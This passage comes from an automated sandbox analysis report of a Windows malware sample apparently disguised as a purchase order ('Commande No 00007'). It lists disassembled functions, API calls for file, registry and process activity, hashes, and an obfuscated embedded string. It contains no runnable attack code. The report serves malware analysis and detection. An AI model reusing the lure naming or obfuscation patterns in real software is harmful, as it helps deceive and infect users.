                                                        • Opcode ID: 57f52ef8ebfd3b6830ca252784d29864a174ee9a5c8600b40a037bd56b74384a
                                                        • Instruction ID: 0388e715484a44d40d4ddbde005df80b94e1e5136e8ff3af7516764e2fd1b4f7
                                                        • Opcode Fuzzy Hash: 57f52ef8ebfd3b6830ca252784d29864a174ee9a5c8600b40a037bd56b74384a
                                                        • Instruction Fuzzy Hash: 0F913170E00229CBDF28CF98C8447ADBBB1FF44305F15816AD816BB281D778AA96DF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406604 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ec44333397786e712ce86ed3a064858ade4f3ed38e69d8951d19f407b84ebf46
                                                        • Instruction ID: e5fca131ad03ef0b1cae302aca876d249310e041a0af9db6593aad5c0906a822
                                                        • Opcode Fuzzy Hash: ec44333397786e712ce86ed3a064858ade4f3ed38e69d8951d19f407b84ebf46
                                                        • Instruction Fuzzy Hash: DA814571E04228CFDF24CFA8C8447ADBBB1FB45305F25816AD416BB281D7789A96DF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406557 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 52914874a4ae288a0090ad4813887b32842d8fe9a5a82c0860c7b0c89e61596f
                                                        • Instruction ID: 58d989ae5c12bcd237a7596d454377c992e25c5bcc6bbfe45bc07114c875b854
                                                        • Opcode Fuzzy Hash: 52914874a4ae288a0090ad4813887b32842d8fe9a5a82c0860c7b0c89e61596f
                                                        • Instruction Fuzzy Hash: 867113B1E04229CBDF28CF98C844BADBBF1FB44305F15816AD816BB281D7789996DF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406675 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 52544ba4eeb4024bb91b054a352ce2e9af5c1c52a3f63a0d20291f7e24db374d
                                                        • Instruction ID: ed3c1b2e2e9110b05ca1f1fb00e1e18bfdebd83ec129b9da7b835b7cf566ec6e
                                                        • Opcode Fuzzy Hash: 52544ba4eeb4024bb91b054a352ce2e9af5c1c52a3f63a0d20291f7e24db374d
                                                        • Instruction Fuzzy Hash: 7D712271E04229CFDF28CFA8C844BADBBB1FB44305F15816AD816BB281D7789996DF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004065C1 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1ead19a7d6b18f14945d6ecc7a756aa80631c696357f52aa6e4b7da038a1b463
                                                        • Instruction ID: a58d0c8a3e5e471a1862abd912d582b465d9d5205f6115614135299ff5c3e34f
                                                        • Opcode Fuzzy Hash: 1ead19a7d6b18f14945d6ecc7a756aa80631c696357f52aa6e4b7da038a1b463
                                                        • Instruction Fuzzy Hash: F9714771E00229CBDF28CF98C8447ADBBB1FF44305F15806AD816BB281D7789956DF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402F1F Relevance: 4.6, APIs: 3, Instructions: 95fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000,00409130,?), ref: 00402F45
                                                        • WriteFile.KERNELBASE(00000000,00412888,?,000000FF,00000000,00412888,00004000,00409130,00409130,00000004,00000004,00000000,00000000,?,?), ref: 00402FD2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: File$PointerWrite
                                                        • String ID:
                                                        • API String ID: 539440098-0
                                                        • Opcode ID: 1c898c40f4255edd407dd83f9c9e53847d876c5e3b3b92bcfc21a2c66a14f794
                                                        • Instruction ID: e6de339a950e3072e6bd285c0139ce9fe6f591fe0572f4373a504b9c05a9d2ef
                                                        • Opcode Fuzzy Hash: 1c898c40f4255edd407dd83f9c9e53847d876c5e3b3b92bcfc21a2c66a14f794
                                                        • Instruction Fuzzy Hash: 42316970502259EBDF20DF55ED44A9E3BBCEB003A5F20803AF904E61D0D374DA40EBA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401E32 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00404FC9: lstrlenA.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405002
                                                          • Part of subcall function 00404FC9: lstrlenA.KERNEL32(00402C51,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405012
                                                          • Part of subcall function 00404FC9: lstrcatA.KERNEL32(Completed,00402C51,00402C51,Completed,00000000,00000000,00000000), ref: 00405025
                                                          • Part of subcall function 00404FC9: SetWindowTextA.USER32(Completed,Completed), ref: 00405037
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505D
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405077
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405085
                                                          • Part of subcall function 00405491: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004214E8,Error launching installer), ref: 004054B6
                                                          • Part of subcall function 00405491: CloseHandle.KERNEL32(?), ref: 004054C3
                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E6C
                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E7C
                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 3521207402-0
                                                        • Opcode ID: 5c9000391534237a7d837c1e9581a0c0eef02dad9902a12460307e03ca68f42d
                                                        • Instruction ID: 6f705a643f824a2c918d297b47beca74151f8a63177eb59d1388921c388295f8
                                                        • Opcode Fuzzy Hash: 5c9000391534237a7d837c1e9581a0c0eef02dad9902a12460307e03ca68f42d
                                                        • Instruction Fuzzy Hash: DD016D71904118FBDF20AFA1CD459AE7B71EB00345F10857BFA01B51E1C3788A81DBAA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040243A Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                        • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402468
                                                        • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 0040247B
                                                        • RegCloseKey.KERNELBASE(?,?,?,00409BB0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Enum$CloseOpenValue
                                                        • String ID:
                                                        • API String ID: 167947723-0
                                                        • Opcode ID: b48f0e00db685190992d590887bda2c11294440da915d161efab090941f01ef2
                                                        • Instruction ID: ea0f8bb5b2539548621220bc90554a9af61e98564e095efd323173a2c2703bf4
                                                        • Opcode Fuzzy Hash: b48f0e00db685190992d590887bda2c11294440da915d161efab090941f01ef2
                                                        • Instruction Fuzzy Hash: 57F081B2A04204FFE7119F659E8CEBF7A6CEB40748F10853EF441B62C0D6B95E41966A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004059E7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,00412888,Fysi`"Landl`$Stride subvnDis,ev adi: lgedL CaluODemonCCaukeAKrselLProvoA th,oP unluPSmitiD DyesA.emigTBroacASignz\Fl rbs Eks aTusinlNormapSandbeJoypot WhoreEpagorIambosGelaty,kserrTaccae TachfV ndkaPo tbbMaximr Mas,iBefstkAfnazkDentie StedrTrichsmetam\ SkanoT,004031C9,00409130,00409130,004030BB,00412888,00004000,?,00000000,?), ref: 004059FB
                                                        Strings
                                                        • Fysi`"Landl`$Stride subvnDis,ev adi: lgedL CaluODemonCCaukeAKrselLProvoA th,oP unluPSmitiD DyesA.emigTBroacASignz\Fl rbs Eks aTusinlNormapSandbeJoypot WhoreEpagorIambosGelaty,kserrTaccae TachfV ndkaPo tbbMaximr Mas,iBefstkAfnazkDentie StedrTrichsmetam\ SkanoT, xrefs: 004059E7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID: Fysi`"Landl`$Stride subvnDis,ev adi: lgedL CaluODemonCCaukeAKrselLProvoA th,oP unluPSmitiD DyesA.emigTBroacASignz\Fl rbs Eks aTusinlNormapSandbeJoypot WhoreEpagorIambosGelaty,kserrTaccae TachfV ndkaPo tbbMaximr Mas,iBefstkAfnazkDentie StedrTrichsmetam\ SkanoT
                                                        • API String ID: 2738559852-112686333
                                                        • Opcode ID: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                                                        • Instruction ID: 267b57ffcffc4b39201858a503e5f4d445fc1ddc2041b1288b81c8d36a0eb731
                                                        • Opcode Fuzzy Hash: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                                                        • Instruction Fuzzy Hash: E6E0E632754199AFDF209E559C44EEB775CEB05350F004532FA15F3150D631E9219FA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004023C8 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                        • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023F8
                                                        • RegCloseKey.KERNELBASE(?,?,?,00409BB0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID:
                                                        • API String ID: 3677997916-0
                                                        • Opcode ID: 554d3d18749224be1ffdffcdc3dcd0d8b1fddfaf5b0a3e68b09adb95bd2e3084
                                                        • Instruction ID: 3e5648d23b1537cbe7151ba7cdfd06ebb71b75e9977eff4765d7e8492c0e8cfe
                                                        • Opcode Fuzzy Hash: 554d3d18749224be1ffdffcdc3dcd0d8b1fddfaf5b0a3e68b09adb95bd2e3084
                                                        • Instruction Fuzzy Hash: A311C171905205EFDB11DF64CA889BEBBB4EF00344F20843FE441B62C0D2B84A41DB6A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: b1266aa11e643af42e09abacd7039328ff80c1a9d1715c4620ec2c771a0149d8
                                                        • Instruction ID: debc39b6c0c0c652093bc86d0143b21aa6e0fee53ad258223395c8adf4e96fc0
                                                        • Opcode Fuzzy Hash: b1266aa11e643af42e09abacd7039328ff80c1a9d1715c4620ec2c771a0149d8
                                                        • Instruction Fuzzy Hash: 69012831724210ABE7294B789D04B6A3698FB10315F11853BF851F72F1D6B8DC029B5D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004022C0 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004022DF
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004022E8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CloseDeleteOpenValue
                                                        • String ID:
                                                        • API String ID: 849931509-0
                                                        • Opcode ID: 3a290400a623cc3eae9c3e5656087265b109e68777a4af8c05a58fc60a034409
                                                        • Instruction ID: 0b5143e1148f93cd965e23b4eca136ef14321d11ac2ad27151b5c1ea94f2786d
                                                        • Opcode Fuzzy Hash: 3a290400a623cc3eae9c3e5656087265b109e68777a4af8c05a58fc60a034409
                                                        • Instruction Fuzzy Hash: CAF06273A04111ABDB51BBF4DB8EAAE7268AB40318F14453BF501B71C1DAFC5E01A67E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040509B Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OleInitialize.OLE32(00000000), ref: 004050AB
                                                          • Part of subcall function 00404018: SendMessageA.USER32(000103F2,00000000,00000000,00000000), ref: 0040402A
                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050F7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: InitializeMessageSendUninitialize
                                                        • String ID:
                                                        • API String ID: 2896919175-0
                                                        • Opcode ID: 9581bd5c9e3a5a381fcf752a9dd70ad08072693e91799a662e34e922ee423c40
                                                        • Instruction ID: 490961c689e4e2a5abeff1ab03112a1b506459fea5da82fd079fd8beaf77c0ba
                                                        • Opcode Fuzzy Hash: 9581bd5c9e3a5a381fcf752a9dd70ad08072693e91799a662e34e922ee423c40
                                                        • Instruction Fuzzy Hash: 10F090F76046019AEA216B549D01B1B77B0EBD0306F15C43EEF44722E1D67959428EAD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040596F Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,80000000,00000003), ref: 00405973
                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405995
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCreate
                                                        • String ID:
                                                        • API String ID: 415043291-0
